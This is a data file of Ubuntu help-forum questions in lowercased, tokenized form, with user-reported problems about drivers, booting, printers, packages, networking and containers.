389083	ubuntu 12.04 broadcom 4313 wireless problem	i am using ubuntu 32bit and 64 bit . in ubuntu 32 bit i was successful in working wirelessly , but slow . in ubuntu 12.04 64 bit , i tried all : activating broadcom sta wirelss drivers no luck , deactiving them and installing with new version , many tries but wirelss did n't work . sometimes , my wlan card does n't detected at all - no network devices available in the network manager . i tried blacklisting and other resources that are available on the web . no luck . on 32 bit : slow drivers worked for me : sta broadcom-wireless bcmwl-kernel-source_5.100.82.38+bdcom-0ubuntu6_i386.deb but 64 bit version of drivers bcmwl-kernel-source_5.100.82.38+bdcom-0ubuntu6_amd64.deb did n't work on machine . i am tired of trying and ubuntu should take care of such pathetic issues . do n't know why they make things worse after updates . in ubuntu 11.10 everything was working fine . lshw network description : wireless interface product : bcm4313 802.11bgn wireless network adapter vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:02:00.0 logical name : eth0 version : 01 serial : 08 : ed : b9 : e2 : b8:39 width : 64 bits clock : 33mhz capabilities : bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=wl0 driverversion=5.100.82.112 ip=10.100.28.51 latency=0 multicast=yes wireless=ieee 802.11 how to resolve this ?
389084	system testing tool for ubuntu	i want to test my hardware function and find errors . is there any system testing tool available for ubuntu ?
389089	`` quota error ( device dm-* ) find_block_dequentry : quota for id * referenced but not present '' messages whenever i boot	one week after installation of the perfect server - ubuntu 12.04 lts i got server crash . in log files i do n't see any errors so i made photos . one more thing i inserted new ram modules ( before was 4 gb , now 16 gb ) . then i tried to make memtest and got : error to small lover memory ( 0x99100 > 0x8f000 ) after all i replaced my old ram module but errors there still occurred . how to resolve this ?
389091	how to install symform.deb ?	i 've an updated ubuntu 13.10 and i want to install the .deb from symform ( a cloud nas service ) . but i 'm having problems when i download the .deb and installing it from their website http : //www.symform.com/download/ . is there an apt-get for symform in any repo ? why is the .deb giving the following error when i sudo dkpg -i symform.deb ? it keeps on printing the certificate ... alvas @ ubi : ~/downloads $ sudo dpkg -i symform.deb [ sudo ] password for alvas : selecting previously unselected package symform . ( reading database ... 598899 files and directories currently installed . ) unpacking symform ( from symform.deb ) ... setting up symform ( 3.19.7-1 ) ... mono certificate manager - version 3.2.7.0 manage x.509 certificates and crl from stores . copyright 2002 , 2003 motus technologies . copyright 2004-2008 novell . bsd licensed . 1 certificate ( s ) added to store trust . mono certificate manager - version 3.2.7.0 manage x.509 certificates and crl from stores . copyright 2002 , 2003 motus technologies . copyright 2004-2008 novell . bsd licensed . 1 certificate ( s ) added to store trust . mono certificate manager - version 3.2.7.0 manage x.509 certificates and crl from stores . copyright 2002 , 2003 motus technologies . copyright 2004-2008 novell . bsd licensed . 1 certificate ( s ) added to store trust . mono certificate manager - version 3.2.7.0 manage x.509 certificates and crl from stores . copyright 2002 , 2003 motus technologies . copyright 2004-2008 novell . bsd licensed . 1 certificate ( s ) added to store trust . mono certificate manager - version 3.2.7.0 manage x.509 certificates and crl from stores . copyright 2002 , 2003 motus technologies . copyright 2004-2008 novell . bsd licensed . 1 certificate ( s ) added to store trust . mono certificate manager - version 3.2.7.0 manage x.509 certificates and crl from stores . copyright 2002 , 2003 motus technologies . copyright 2004-2008 novell . bsd licensed . 1 certificate ( s ) added to store trust . mono certificate manager - version 3.2.7.0 manage x.509 certificates and crl from stores . copyright 2002 , 2003 motus technologies . copyright 2004-2008 novell . bsd licensed . 1 certificate ( s ) added to store trust . mono certificate manager - version 3.2.7.0 manage x.509 certificates and crl from stores . copyright 2002 , 2003 motus technologies . copyright 2004-2008 novell . bsd licensed . 1 certificate ( s ) added to store trust . mono certificate manager - version 3.2.7.0 manage x.509 certificates and crl from stores . copyright 2002 , 2003 motus technologies . copyright 2004-2008 novell . bsd licensed . 1 certificate ( s ) added to store trust . mono certificate manager - version 3.2.7.0 manage x.509 certificates and crl from stores . copyright 2002 , 2003 motus technologies . copyright 2004-2008 novell . bsd licensed . 1 certificate ( s ) added to store trust . mono certificate manager - version 3.2.7.0 manage x.509 certificates and crl from stores . copyright 2002 , 2003 motus technologies . copyright 2004-2008 novell . bsd licensed . 1 certificate ( s ) added to store trust . mono certificate manager - version 3.2.7.0 manage x.509 certificates and crl from stores . copyright 2002 , 2003 motus technologies . copyright 2004-2008 novell . bsd licensed . 1 certificate ( s ) added to store trust . mono certificate manager - version 3.2.7.0 manage x.509 certificates and crl from stores . copyright 2002 , 2003 motus technologies . copyright 2004-2008 novell . bsd licensed . 1 certificate ( s ) added to store trust . mono certificate manager - version 3.2.7.0 manage x.509 certificates and crl from stores . copyright 2002 , 2003 motus technologies . copyright 2004-2008 novell . bsd licensed . 1 certificate ( s ) added to store trust . mono certificate manager - version 3.2.7.0 manage x.509 certificates and crl from stores . copyright 2002 , 2003 motus technologies . copyright 2004-2008 novell . bsd licensed . 1 certificate ( s ) added to store trust . mono certificate manager - version 3.2.7.0 manage x.509 certificates and crl from stores . copyright 2002 , 2003 motus technologies . copyright 2004-2008 novell . bsd licensed . 1 certificate ( s ) added to store trust . mono certificate manager - version 3.2.7.0 manage x.509 certificates and crl from stores . copyright 2002 , 2003 motus technologies . copyright 2004-2008 novell . bsd licensed . 1 certificate ( s ) added to store trust . mono certificate manager - version 3.2.7.0 manage x.509 certificates and crl from stores . copyright 2002 , 2003 motus technologies . copyright 2004-2008 novell . bsd licensed . 1 certificate ( s ) added to store trust . mono certificate manager - version 3.2.7.0 manage x.509 certificates and crl from stores . copyright 2002 , 2003 motus technologies . copyright 2004-2008 novell . bsd licensed . 1 certificate ( s ) added to store trust . mono certificate manager - version 3.2.7.0 manage x.509 certificates and crl from stores . copyright 2002 , 2003 motus technologies . copyright 2004-2008 novell . bsd licensed . 1 certificate ( s ) added to store trust . mono certificate manager - version 3.2.7.0 manage x.509 certificates and crl from stores . copyright 2002 , 2003 motus technologies . copyright 2004-2008 novell . bsd licensed . 1 certificate ( s ) added to store trust . mono certificate manager - version 3.2.7.0 manage x.509 certificates and crl from stores . copyright 2002 , 2003 motus technologies . copyright 2004-2008 novell . bsd licensed . 1 certificate ( s ) added to store trust . mono certificate manager - version 3.2.7.0 manage x.509 certificates and crl from stores . copyright 2002 , 2003 motus technologies . copyright 2004-2008 novell . bsd licensed . 1 certificate ( s ) added to store trust . mono certificate manager - version 3.2.7.0 manage x.509 certificates and crl from stores . copyright 2002 , 2003 motus technologies . copyright 2004-2008 novell . bsd licensed . 1 certificate ( s ) added to store trust . mono certificate manager - version 3.2.7.0 manage x.509 certificates and crl from stores . copyright 2002 , 2003 motus technologies . copyright 2004-2008 novell . bsd licensed . 1 certificate ( s ) added to store trust . mono certificate manager - version 3.2.7.0 manage x.509 certificates and crl from stores . copyright 2002 , 2003 motus technologies . copyright 2004-2008 novell . bsd licensed . 1 certificate ( s ) added to store trust . mono certificate manager - version 3.2.7.0 manage x.509 certificates and crl from stores . copyright 2002 , 2003 motus technologies . copyright 2004-2008 novell . bsd licensed . 1 certificate ( s ) added to store trust . mono certificate manager - version 3.2.7.0 manage x.509 certificates and crl from stores . copyright 2002 , 2003 motus technologies . copyright 2004-2008 novell . bsd licensed . ^cdpkg : error processing symform ( -- install ) : subprocess installed post-installation script was interrupted errors were encountered while processing : symform
389094	sound not working for ubuntu 13.04	i am having problems in getting the sound cards work . the sound card icon is missing on the top right of the screen . only dummy output is showing instead of the sound card . i have tried re installing pulse audio , changing the values in alsamixer . only pcm and digital bars are showing . i am pasting the results below : $ pacmd list-sinks welcome to pulseaudio ! use `` help '' for usage information . 1 sink ( s ) available . * index : 0 name : driver : flags : decibel_volume latency dynamic_latency state : suspended suspend cause : idle priority : 1000 volume : 0 : 82 % 1 : 82 % 0 : -5.17 db 1 : -5.17 db balance 0.00 base volume : 100 % 0.00 db volume steps : 65537 muted : no current latency : 0.00 ms max request : 344 kib max rewind : 344 kib monitor source : 0 sample spec : s16le 2ch 44100hz channel map : front-left , front-right stereo used by : 0 linked by : 0 configured latency : 0.00 ms ; range is 0.50 .. 2000.00 ms module : 8 properties : device.description = `` dummy output '' device.class = `` abstract '' device.icon_name = `` audio-card '' anybody please help me for a solution .
389096	upgrade to ubuntu 13.10	i want to upgrade my ubuntu 11.10 , because i can not install wvdial on it . but in ubuntu 13.10 wvdial is installed on ubuntu 13.10 by default . how can i upgrade my ubuntu 11.10 to ubuntu 13.10 via live disc ?
389097	how do i get ubuntu source code ?	i have to port ubuntu 12.04.2 to freescale i.mx6 processor . i understand 12.04.2 has to be cross compiled for arm - so where do i get source of precise pangolin ? please suggest .
389101	ubuntu on not so old mobile phone	i have lg gt500 puccini and want to install any version of ubuntu on it , but i do n't have an idea how . you have ubuntu for mobile phone , but i do n't know where to start . i search internet , but no success . if there is some way to install android or something else , i 'll try it . phone is not so old , serves me fine but i need many of new options like viber , maps etc .
389102	keep getting autodeply.zip missing for ubuntu touch	i 'm trying to follow the instructions on the ubuntu wiki but everytime i run the phablet flash command i get : ca n't open cache/recover/ubuntu_command checking for autodeply.zip autodeploy.zip not found i am trying to install on a nexus 4 4.4 system , does anyone what might be wrong ?
389106	to perform printer maintenance in ubuntu , is there an application for several types of printers ?	to perform printer maintenance in ubuntu , is there an application that is available for several types of printers ? i want to get details about ink levels and do clean the printer and align the cartridges . i am concerning that through the drivers and packages found on official ubuntu repository .
389108	rdp to ubuntu 13.04 from windows 8 is not working	rdp to ubuntu 13.04 from windows 8 is not working . i have used sudo apt-get install xrdp to install xrdp i am getting a blank screen after giving user credentials of ubuntu ( sesman-xvnc ) how to resolve this ?
389113	hp psc 1400 printer	i have installed a hp psc 1400 printer and it will print but i can not find any controls for scanning . when i open the `` printer '' page all i get are the controls for printing . can someone please tell me how to get the scanning function to work ?
389114	how do i make ctrl+f4 close a tab in firefox in kde ?	i 'm used to closing firefox tabs using the ctrl+f4 shortcut . but this shortcut is not working in linux mint 15 kde . i was unable to find the `` close tab '' option in shortcuts options in kde . how do i do this ?
389115	dual boot : ubuntu 12.04 and windows8 grub does n't detect windows and even boot repair did n't work	i have installed windows 8 in the partition sda4 ( and ubuntu 12.04 was pre-installed ) - partition screenshot below - and then tried recommended repair using boot-repair . but after boot-repair , grub does not detect windows . i 've tried to repair grub twice ( using boot-repair ) , but no gain . ( earlier i installed windows in logical partition but now , it is in primary then why it does n't get detected by grub ? ) so far i 've tried these ... installed windows and later performed recommended-repair using livecd chrooted into the partition and update grub ( following this http : //askubuntu.com/a/88432/202806 ) chrooted into the partition and installed grub and again updated it ( following step 7 http : //askubuntu.com/a/88432/202806 ) contents of grub.cfg - updated ( please note that this file is in the directory /boot/grub and not in etc/grub . in fact , there is no such directory like etc/grub . ) http : //pastebin.com/sutfsbsl also , if it may be related to the problem in any way ... ubuntu does not show the 101gb ( ntfs in which windows is installed ) partition in the devices and gparted shows an exclamation sign beside this particular partition , asking to run chkdsk /f on windows and rebooting twice ( this was not shown while i was on livecd ) but i am able to successfully mount this partition using terminal . more info ( if it may help with another question ) : initially the /home was around 246gb and i shrank it to 146gb and installed windows in 100 gb ( logical partition ) . later when i got to know that windows wo n't boot from logical i managed to move that 100gb ( after deleting it ) out of extended by moving the 100gb unallocated space to bottom and decreasing the size of extended partition . i installed windows in this ( now ) primary partition and repaired grub . but grub did n't show windows loader option . so i again repaired windows boot loader . now here i got two windows options , windows 8 and windows 8 on volume6 . the earlier is the option for the windows which i earlier installed when that was a logical drive . my ( second - it is not related to ubuntu though ) question is why and how is windows boot loader is getting info about the previous installation of windows as i had deleted the partition later .
389118	packet tracer 6.0.1 - problem with running ( error while loading shared libraries : libqtscripttools.so.4 : ... )	i have installed smoothly ptr 6.0.1 according to this site ( how do i run cisco packet tracer 6.0.1 ? ) , but when i want to run it this error appears : packettracer6 : error while loading shared libraries : libqtscripttools.so.4 : can not open shared object file : no such file or directory i have ubuntu version 13.10 . can somebody help me with this ? thanx . edit : hello , so i have installed this libqt4-scriptools : i386 library and now this error appears : packettracer6 : error while loading shared libraries : libqt3support.so.4 : can not open shared object file : no such file or directory . i find this library here : /usr/local/packettracer6/lib/libqt3support.so.4
389122	how to remove windows 7 if i have installed with wubi ?	so , i just recently installed ubuntu 12.04 with a windows installer ( wubi ) and i want to delete windows 7 completely leaving ubuntu alone . does anyone know how to do that without having to do everything all over again ?
389131	how to make password visible in ubuntu login screen ?	my six month-old child was hitting the keyboard of my locked laptop . and after some time i noticed that characters in the password entry field are visible ( i mean not as asterisks ) . is this some kind of feature ? and if so , how to reproduce this ? or is this some kind of security breach ? i am using ubuntu 12.10 ( quantal ) 64-bit .
389134	replacement for xp	what is the best set-up to replace windows xp on a .samsung netbook ? this would have to be done without using an optical drive ( hence must be done using a thumb drive ) . experience of computing is very limited , and even more so with linux , so can not use complex coding methods .
389138	rm file ' ? ? q : q '	i accidently created a file named ? ? q : q and i ca n't remove it . rm ' ? ? q : q ' or rm '\ ? \ ? q\ : q ' ( to escape the ? ) says no such file or directory another interesting thing : in ls it shows the name as ? ? q : q . but when i type rm < tab > < tab > is says ^ ? ^ ? q : q ( i tried to remove it with this name , too )
389142	trouble installing ubuntu 13.10 on uefi disk	gurus i am trying to install ubuntu 13.10 amd64 on a lenovo m91p thinkcenter . but every post install boot ends up with 1962 : no os found . i want to keep just ubuntu as the only os on the host ( previously running win xp sp3 ) this is what i have done so far : intially i tried installing the server os ( since thats what i wanted ) . previously the station was running win xp proff sp3 . saw the issue for the first time . did some googling to come across ubuntu uefi help articles https : //help.ubuntu.com/community/uefi - tried both trial and error and install in efi mode using ubuntu gnome 13.10 . no good basically , i have tried to install from `` try ubuntu '' option of live dvd also , both retaining and erasing the existing partitions , but no improvement . below is the boot repair summary link bootrepair summary run from live dvd of the current state any help will be highly appreciated . best soumik
389144	how do i fix unmet dependencies linux-image-generic etc	my battery died on an upgrade and now i have this problem when i try to install updates . how do i fix it ? the following packages have unmet dependencies : linux-generic : depends : linux-image-generic ( = 3.2.0.52.62 ) but 3.2.0.57.68 is installed depends : linux-headers-generic ( = 3.2.0.52.62 ) but 3.2.0.57.68 is installed
389147	how to remove debian screen at system start ?	i have ubuntu 12.04lts on my lenovo s205 laptop . five days back , i was trying to install `` mailutils '' and `` sendmail '' for learning purpose . since i installed this , i get a debian screen when i start my laptop , where i have to select the os i want to boot in . this screen does n't show every time but about at least 2 out of 5 times . i tried uninstalling mailutils and sendmail , which i do n't exactly are the reason for this screen . i do n't have any other os on my laptop and hence , want to get rid of it . i am a fairly new user . so , a step-by-step help would be highly appreciated .
389150	what 's the matter with my gtk here ?	every time i run a gtk program such nautilus , synaptic , those kind of appears again and again but those programs can still run : ( gnome-terminal:589 ) : glib-gobject-warning ** : two different plugins tried to register 'basicenginefc ' . ( gnome-terminal:589 ) : glib-gobject-critical ** : g_object_new : assertion 'g_type_is_object ( object_type ) ' failed ... what 's the matter with it ?
389151	can not change background , icons , etc	i have installed 12.04 , kept my home folder ( coming from a bugged and unstable 13.10 ) issue is , i can not change desktop wallpaper , any change to the dock is reset upon restart , occasionally open apps do not show up in dock . i have tried the unity reset command but the issue persists . any idea ? any prefernce file i could delete ?
389153	low wireless signal	i 'm using a wireless adapter tp-link tl-wn725n with this driver and wireless signal is extremely low in ubuntu 13.10 and barely loads google . thought no problems with it in windows . how can i fix it ? wlan1 ieee 802.11bgn essid : '' iarna '' nickname : '' < wifi @ realtek > '' mode : managed frequency:2.427 ghz access point : 64:66 : b3 : af : cc:9a bit rate:150 mb/s sensitivity:0/0 retry : off rts thr : off fragment thr : off power management : off link quality=0/100 signal level=2/100 noise level=0/100 rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:0 missed beacon:0
389156	how do i format an usb to ext4 to use it on ubuntu without without sudo permisions ?	i use ubuntu in a machine i own and in a machine i only have standard user permissions ( not admin ) . is there any way to format a usb to ext4 and make it work ( file ownership problems ) if i can not run sudo commands on the second machine ? ideally the solution would work on any other ubuntu/linux with whatever kind of account .
389157	two ubuntu versions on the same computer	is it possible to install both ubuntu 12.04lts and ubuntu 13.10 on the same computer ? i already have 12.04 32bit and just wan na try the new version . i run ubuntu on dell latitude d620 .
389158	why two libpango exist ?	$ dpkg -l '*pango*' desired=unknown/install/remove/purge/hold | status=not/inst/conf-files/unpacked/half-conf/half-inst/trig-await/trig-pend |/ err ? = ( none ) /reinst-required ( status , err : uppercase=bad ) ||/ name version architecture description +++-=========================-=================-=================-======================================================== ii gir1.2-pango-1.0 1.32.5-5ubuntu1 amd64 layout and rendering of internationalized text - gir bin ii libcogl-pango12 : amd64 1.14.0-2 amd64 object oriented gl/gles abstraction/utility layer ii libpango-1.0-0 : amd64 1.32.5-5ubuntu1 amd64 layout and rendering of internationalized text ii libpango1.0-0 : amd64 1.32.5-5ubuntu1 amd64 layout and rendering of internationalized text ii libpangocairo-1.0-0 : amd64 1.32.5-5ubuntu1 amd64 layout and rendering of internationalized text ii libpangoft2-1.0-0 : amd64 1.32.5-5ubuntu1 amd64 layout and rendering of internationalized text ii libpangomm-1.4-1 : amd64 2.34.0-1 amd64 c++ wrapper for pango ( shared libraries ) ii libpangox-1.0-0 : amd64 0.0.2-4 amd64 pango library x backend ii libpangoxft-1.0-0 : amd64 1.32.5-5ubuntu1 amd64 layout and rendering of internationalized text why two libpango exist here ? one is libpango-1.0-0 : amd64 , another one is libpango1.0-0 : amd64 ?
389160	ubuntu will not recognise my samsung c5220 phone	i 'm trying to use my samsung c5220 mobile phone as a modem . i 've installed samsung pc studio using wine but it does not recognise the phone as being connected . i have done lsusb in a terminal window and see that ubuntu is recognising the phone as being connected as `` bus 003 device 006 : id 04e8:6601 samsung electronics co. , ltd mobile phone '' . can anyone advise how i can get the two to meet ? please bear in mind that i 'm a bit of a troglodyte wrt technology so the simplest solution would be best .
389163	no sound in firefox youtube after upgrade to 13.10	after upgarding ubuntu to version 13.10 i do n't have any sound while playing youtube videos in firefox browser ( version 25 - for ubuntu canonical 1.0 ) . i do n't have this problem in chromium browser . other videos work fine in firefox - it 's just this combination youtube+firefox that does not work ( as far as i was able to track ) . i tried reinstalling flashplugin-installer from synaptic . but from what i 've seen it does n't really do anything : flashplugin-installer : downloading http : //archive.canonical.com/pool/partner/a/adobe- flashplugin/adobe-flashplugin_11.2.202.332.orig.tar.gz installing from local file /tmp/tmpheixsz.gz so i tried to do it manually from here http : //get.adobe.com/flashplayer/otherversions/ , but it did not work either . thank you for your help in fixing this ( not very serious but yet irritating ) problem .
389166	dropbox & thunar - recently changed files not opened	i 'm running ubuntu with thunar and dropbox . thunar dropbox integration works fine . buuut : when i click on one of the `` recently changed files '' in dropbox indicator , it opens dropbox main folder , not the desired file . i then need to navigate to file and open it manually . is anyone else experiencing this ? are there any known workarounds ? ca n't find any related bugs on launchpad , and google is not my friend in this case.. thanks in advance !
389171	in a cronjob copy files and change their names to unique values	i want to make a cronjob that makes a copy of every file in /var/log , and puts it in /etc/bak . that i do by making an sh file saying cp /var/log/* . * /etc/bak i would like these files not to be overwritten , but to be unique . to do this i figured i want to put the date/time in the filename . is there any way to make that possible on a batch file copy ?
389172	ubuntu 13.10 on mba 6.2 performance is worse than on mba 5.2	running sysbench on the 6.2 compared to the 5.1 macbook air is a whole lot slower . here is the command i 'm running : sysbench -- test=cpu -- cpu-max-prime=20000 run on the 6.2 it runs in around 48 seconds , and on the 5.1 it runs in 25 seconds ! is there something i 'm missing ?
389176	is there database of linux compatible hardware ?	i want to know if there is a centralised community site where all hardware is listed in terms of compatability with linux . something like appdb for wine .
389179	pidgin does not load all messages in a correspondence ?	i use pidgin to chat with gmail contacts . in cases when : pc is off a message was not sent from pidgin i do not get these messages in the pidgin . is there a way to fix this ? for example , if i send a message via pidgin , it appears in hangouts app on android almost instantly . if the pc if off and i send a message from android phone , then turn on the pc and pidgin , i do not see such messages . other example , i need the same behaviour like on skype . no matter which device i use , when i start skype , all messages are there after a minute or so .
389180	prepared a bootable usb stick from ubuntu-12.04.3-desktop-amd64.iso but it says' can not find operating system '	i know that my usb stick is bootable and i have made it according to the steps in http : //www.ubuntu.com/download/desktop/create-a-usb-stick-on-windows . and it is booting but it shows an error message that , can not find an operating system . i have used the same setup , and installed it by double clicking the wubi.exe from my windows , it downloaded ubuntu-12.04.3-wubi-amd64.tar.xz and installed . so i am not getting a wrong os and i am having bootable usb stick . but still have the same can not find an operating system . error . plz help me..i am new to linux and ubuntu .
389181	wireless disabled by hardware switch `` asus x550c ''	the wifi will sporadically work . the laptop came with windows 8 pre-installed .
389186	ubuntu 13.10 external monitor is not recognized on hp pavilion dv7	monitor worked on open-source drivers for ubuntu 13.04/ when i upgraded to ubuntu 13.10 , open source drivers did not recognize any monitor ( display settings say : `` could not get screen information '' . ) . i could use only native laptop monitor . i decided to install amd radeon drivers form amd official site . installed them successfully : $ fglrxinfo display : :0 screen : 0 opengl vendor string : advanced micro devices , inc. opengl renderer string : amd radeon hd 6400m series opengl version string : 4.3.12614 compatibility profile context 13.25.18 then i open display settings and still see : `` could not get screen information '' . can anyone help me manually set up second monitor ? thanks in advance .
389187	make bootable usb/dvd from mac for pc installation	i 've downloaded the last 64 bit version of ubuntu on my macbook pro . now i want to create a bootable usb/dvd for install ubuntu on my pc , but i 'm on a mac . my pc is formatted , so i ca n't use it . please help !
389191	my keyboard does not work when choosing boot options	my keyboard does not work when choosing boot options after installing ubuntu 13.10 it auto boots to ubuntu on the countdown
389196	hp printer does not scan any document in ubuntu	i am using ubuntu 11.10 for last 2 or 3 days . i like it . now problem is that , when i installed my printer hp f2180 on ubuntu . it prints very well in ubuntu.but , i can not scan any type of document through this printer in ubuntu.while in my other windows pc , the printer works very well . it prints good and also scan very well . in ubuntu , where can i find the option for scanning the document via my printer . i am new to ubuntu or linux world . please give me answer with full instrunction . thank you
389197	ubuntu 13.04 update error in terminal window	i coud n't update my newly installed ubuntu software . i get error like this matha @ matha-hcl-notebook : ~ $ sudo apt-get update [ sudo ] password for matha : e : could not get lock /var/lib/apt/lists/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock directory /var/lib/apt/lists/
389199	how to launch a download , it asks me which file to open with but i have no idea	i download a few items for my school work but can not launch them . it keeps asking which program to i want to open with . it isnt like windows when it automatically knows .
389214	ubuntu gnome vs ubuntu `` normal '' with gnome	so , i know there is the ubuntu gnome distro . and then there is ubuntu , where i can add ( and hence use ) gnome . what 's the difference between those two ?
389216	duall boot with two linux	please give me full instrunction for dual boot of two linux one is ubuntu and second is fedora . i like ubuntu but , also fedora thank you
389219	eclipse running very slow on ubuntu	i am new on ubuntu . i am developing one application using eclipse ( version : kepler service release 1 , build id : 20130919-0819 ) . i have dual os on my pc . window 8 as well as ubuntu . but now a days i am mostly using ubuntu for my development work . but problem is my eclipse is stuck on every copy/selection command for 20-30 seconds , and whole os running very slow . i ca n't figure out where is the problem . can someone help me to solve this problem ? thanks .
389220	bluez 5 in ubuntu is n't working	i 've installed the bluez 5 package from source . when i run the interactive command from terminal : bluetoothctl , the interactive mode starts , and the prompt changes to bluetooth . when i click on show : i get the error message : no default controller available . how can i get bluez 5 to recognize my bluetooth adapter ?
389222	brokencount < 0 broken packages	so , ive have had problems with my packages and software center for sometime . i ca n't download any packages , and ca n't open software center obviously . it says that i have brokencount < 0 . how can i fix my packages ? i tried sudo apt-get autoclean sudo apt-get autoremove . any ideas ?
389227	problem with nvidia drivers for k20 , c2070 on ubuntu 12.04	my desktop has the following configuration , processor : intel core i7-4770k 3.5 ghz mother board : msi z87-g43 64gb ddr3 intel motherboard gpus : nvidia tesla k20 , nvidia tesla c2070 and with 32 gb ram . i plan to use it for gpgpu based scientific computation in my research . and for that i want cuda-5.5 on ubuntu 12.04 . i went for dual boot with windows 7 and ubuntu 12.04 . installation of windows 7 and ubuntu 12.04 went fine . then i followed the steps mentioned here to install cuda-5.5 on ubuntu 12.04 , but could not go beyond the installation of the nvidia drivers ( step i ) . after installing the proprietary nvidia driver ( nvidia-linux-x86_64-331.20 ) suggested by nvidia for k20 & c2070 and rebooting , the display freezes at the screen with the ubuntu logo , before the login screen appears . i 've also tried with removing the proprietary nvidia drivers and installing ppa based drivers , but that too does n't work . also as i would be needing cuda , so i have to use proprietary nvidia drivers . how can i fix this issue ? i would appreciate any help with fixing this problem . edit : to add , after attaching the gpus to the mother board , the mother board expects the display to be taken from the discrete gpus instead of the integrated graphics card on the mother board . so , currently the display is being taken from the c2070 card . solved : my problem is resolved . i just followed the instructions given for installation of cuda-5.5 on nvidia 's website here . earlier i had tried to install the .run files for the drivers which did n't work . but using the .deb cuda-5.5 installer for ubuntu 12.04 directly , which also includes the drivers , worked fine .
389228	what default windows software alternatives does ubuntu have !	this former windows user is all set with a new ubuntu installed to his box . and now i 'd like to know what default applications i have in my system ? and esp . for these categories : audio video graphics & design internet & network torrent client office packages ( word processors , spreadsheet , etc . ) system and administrative tools command line emulator
389233	how to play ape files using rhythmbox ?	rhythmbox requires to install plugins to play media files of the following type : ape tag demuxerbut how can i install the plugin ?
389235	boot menu does nor show any option	i have a windows 8 sony vaio computer with uefi bios firmware . i installed ubuntu onto my system into another partition . everything worked except when i wanted to boot wondows 8 . the grub menu does not pop up on boot so i can not select to boot windows 8 . how can i fix the grub menu to show up and show windows 8 as a bootable system .
389236	unable to login into lxc-container	i have installed lxc in ubuntu server and created two lxc container . every thing working fine untill i update lxc to latest version . after lxc update , i am able to create new containers , start and login to new container with username=ubuntu and password=ubuntu . with old containers i can start but unable to login as username=ubuntu and password=ubuntu . edit : i checked in nano /var/lib/lxc/mycontainer/rootfs/var/log/auth.log two line says login failed pam_unix ( login : auth ) : authentication failure ; logname= uid=0 euid=0 tty=/dev/lxc/console ruser= rhost= user=ubuntu failed login ( 1 ) on '/dev/lxc/console ' for 'ubuntu ' , authentication failure or is that possible to start container in recovery mode so that i can change passwd for ubuntu user .
389237	unable to load windows and unable to mount windows partitions ( probably corrupted )	it is a kind of messed up situation . i installed ubuntu 13.10 on windows 8 which did n't display ubuntu . i then tried boot-repair by opening try ubuntu without installing . here is the url : http : //paste.ubuntu.com/6555659 at this instant i was unable to load windows . then i changed the bios setting from uefi to legacy which on restarting displayed the message no operating system found . i installed ubuntu 13.10 again . here are my problems : i am unable to load windows . ( it is asking for recovery media which i do n't have right now . ) in ubuntu i am unable to mount any windows partitions . error message : error mounting /dev/sda8 at /media/dew/songs , videos & movies : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 '' `` /dev/sda8 '' `` /media/dew/songs , videos & movies '' ' exited with non-zero exit status 14 : the disk contains an unclean file system ( 0 , 0 ) . metadata kept in windows cache , refused to mount . failed to mount '/dev/sda8 ' : operation not permitted the ntfs partition is in an unsafe state . please resume and shutdown windows fully ( no hibernation or fast restarting ) , or mount the volume read-only with the 'ro ' mount option . i guess that windows was hibernated or did n't shutdown properly . i ca n't open windows again to ensure that it is properly shutdown ( as mentioned earlier i do n't have recovery media ) . i am happy to use ubuntu for a while until i get my recovery media , but meanwhile is there any way to mount my windows partitions ?
389241	using ubuntu as a vpn route ( r )	i 'm attempting to use an ubuntu box as a vpn route ( r ) back to my office for my voip telephone . the voip phone we use , requires stun which does n't work unless on the same network range . so my thinking was to create a linux box , use openvpn to connect back to the office and tell the phone to use it as the default gateway . i have the following setup so far linux ubuntu ; 192.168.0.100 voip phone : 192.168.0.101 ( using 192.168.0.100 as the gw ) on the linux box , i have openvpn configured and working , i can see the remote network at the office if i use the linux server . from the vpn users , all traffic is allowed into the corp network ( only a couple of us ) . i have added the following ruleset to ufw : # nat table rules *nat : postrouting accept [ 0:0 ] # allow forward traffic to tun0 -a postrouting -s 192.168.0.0/24 -o tun0 -j masquerade # process the nat table rules commit however , i ca n't send traffic from the phone up the vpn connection . can someone advise on what i 'm doing wrong , which is probably all of it i 'm honest : (
389245	missing modversions.h	i`m trying to compile a program , which was actually designed for linux os based on kernel 2.4 . when i run the make command , i get the following error /lib/modules/3.8.0-29-generic/build/include/linux/modversions.h : no such file or directory so i tried to locate the file modversions.h manually by running the command sudo find / modversions.h but i could not find any . i tried the following cd /usr/src/linux-headers-3.8.0-29/include/linux make update-modverfile but got the following error make : *** no rule to make target `update-modverfile ' . stop . i also googled about this missing file and it looks to me like this is a common issue with many applications designed for older kernels , so what possibly i could do to fix this issue . please to provide your suggestions . other informations os : ubuntu 12.04 kernel version : 3.8.0-29 program i`m trying to compile : aodv-uu
389250	size limit when mounting cifs share	is there a limit to the size of the cifs share you can mount ? i have a users who was previously able to mount one of our cifs shares , but once i extended the size of the share from 6tb to 8tb , he receives a nt_status_access_denied listing \* message when he to do a dir listing . when he tries to mount to a subfolder within that share he receives tree connect failed : nt_status_bad_network_name . this is seen on two ubuntu machines now . the only thing that has changed is the size of the share .
389251	unable to install busybox-initramfs	i tried to install 13.10 server to 2x3tb hdd with the following partioning ( raid1 + encrypted root and home ) 2 times to following : 256mb efi-boot 500mb /boot raid1 0,95tb / raid1+encrypted 2tb /home raid1+encrypted screenshot : https : //www.dropbox.com/sc/hqhtjv6f4j67pn7/7-bcx_oggu unfortunatly i receive to following error : unable to install busybox-initramfs https : //www.dropbox.com/sc/i2bmzh2f3lrblt8/umtfibkxtx can you please give some hint ? thanks !
